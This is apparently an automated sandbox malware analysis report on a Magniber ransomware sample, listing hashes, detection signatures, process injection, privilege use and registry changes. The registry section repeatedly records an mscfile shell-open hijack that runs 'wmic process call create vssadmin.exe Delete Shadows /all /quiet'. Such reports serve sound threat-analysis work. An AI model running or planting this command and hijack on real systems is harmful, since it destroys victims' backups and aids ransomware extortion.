Malware Analysis Report

2025-01-22 20:47

Sample ID 241205-mtf86axjaq
Target c752934305e1b89f82798ea2c26f70b3_JaffaCakes118
SHA256 20e29bfcd2d3372af66eec996bcbc0babbeb8bc36b6a3edcd3afc70782aaea2e
Tags
magniber defense_evasion discovery execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

20e29bfcd2d3372af66eec996bcbc0babbeb8bc36b6a3edcd3afc70782aaea2e

Threat Level: Known bad

The file c752934305e1b89f82798ea2c26f70b3_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

magniber defense_evasion discovery execution impact ransomware

Magniber family

Detect magniber ransomware

Magniber Ransomware

Process spawned unexpected child process

Renames multiple (93) files with added filename extension

Renames multiple (72) files with added filename extension

Deletes shadow copies

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Browser Information Discovery

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Opens file in notepad (likely ransom note)

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Interacts with shadow copies

Suspicious use of UnmapMainImage

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-05 10:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-05 10:45

Reported

2024-12-05 10:47

Platform

win7-20240708-en

Max time kernel

120s

Max time network

141s

Command Line

"taskhost.exe"

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (93) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L2BFB2JG\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MYC3PENY\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9C9T5AL\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROVWYKHE\desktop.ini C:\Windows\system32\DllHost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2568 set thread context of 1112 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhost.exe
PID 2568 set thread context of 1164 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\Dwm.exe
PID 2568 set thread context of 1204 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 2568 set thread context of 496 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 303bf7df0247db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "439557394" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{09231DD1-B2F6-11EF-85B7-D6CBE06212A9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000615ccd883db7b1459927a3dc74b58ce20000000002000000000010660000000100002000000044cf0d3ed9086944a6479d289498ae38aa8c2b02e963e164cb09b38b5ce4005f000000000e800000000200002000000035d413365433b0fbe563ed55dc29efa74956b6f8e0dd8182b00efd70157dcd54900000004815e89aed0e34ecdacf78ff2cb7ce140b5a99f45d199fdc4cf122125874fe9a6418480b6762f088c08a67dcff53b5a951b3df9f2fcc746abc658ab75140a93d31a2fb462af4003c33c32ba0bc9d37bf453a73a461063fe5888e0df3f68bc76f55f020f75d59a622f8281bb7ab54d633985890475115f9b0ced9f5e0703d0ec9f93570978848a5fb620bb2c82d975a3e40000000f1dc10b7a81fe63e3f6b183744aefbe9c0ff02f186db582c8672fb531ddae370a604b44ca32cd13283e8455fc8ccab58ec7f93b22525493b1c5a32b654a4b608 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000615ccd883db7b1459927a3dc74b58ce200000000020000000000106600000001000020000000b90982fe91f023b3236dde152a8bbd6a89203fdaac2c9fd4a0a7edcf246fe4a4000000000e8000000002000020000000f684a0a08249d2460fcffb9f7b073a14a460cb6b85422db1bcf29687725f2a892000000067f6c5d809a5f7d1ee5fdc7aa6c92f360c3a4d556efd5d9279d3a5999b8424a640000000459ecebed5cb746bb738d732fa0d504f6ebbcc0dd907690640a9688a0b5b6079262a5039028699e6f621a068b11f861d75eee12ff49b1fa99a6f8e88d850c256 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\taskhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\taskhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\Dwm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\Dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open C:\Windows\Explorer.EXE N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1204 wrote to memory of 572 N/A C:\Windows\Explorer.EXE C:\Windows\notepad.exe
PID 1204 wrote to memory of 572 N/A C:\Windows\Explorer.EXE C:\Windows\notepad.exe
PID 1204 wrote to memory of 572 N/A C:\Windows\Explorer.EXE C:\Windows\notepad.exe
PID 1204 wrote to memory of 2216 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 2216 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 2216 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 1724 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1204 wrote to memory of 1724 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1204 wrote to memory of 1724 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1204 wrote to memory of 892 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 892 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 892 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 892 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 892 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 892 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2216 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2216 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2216 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1164 wrote to memory of 2628 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1164 wrote to memory of 2628 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1164 wrote to memory of 2628 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1164 wrote to memory of 2640 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe
PID 1164 wrote to memory of 2640 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe
PID 1164 wrote to memory of 2640 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe
PID 2664 wrote to memory of 2700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2664 wrote to memory of 2700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2664 wrote to memory of 2700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2664 wrote to memory of 2700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2640 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2640 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2640 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2540 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2540 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2540 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1200 wrote to memory of 236 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1200 wrote to memory of 236 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1200 wrote to memory of 236 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2820 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2820 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2820 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2464 wrote to memory of 1340 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2464 wrote to memory of 1340 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2464 wrote to memory of 1340 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2568 wrote to memory of 2904 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2568 wrote to memory of 2904 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2568 wrote to memory of 2904 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2568 wrote to memory of 2372 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 2372 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 2372 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2372 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2372 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1660 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1660 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1660 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2860 wrote to memory of 1620 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
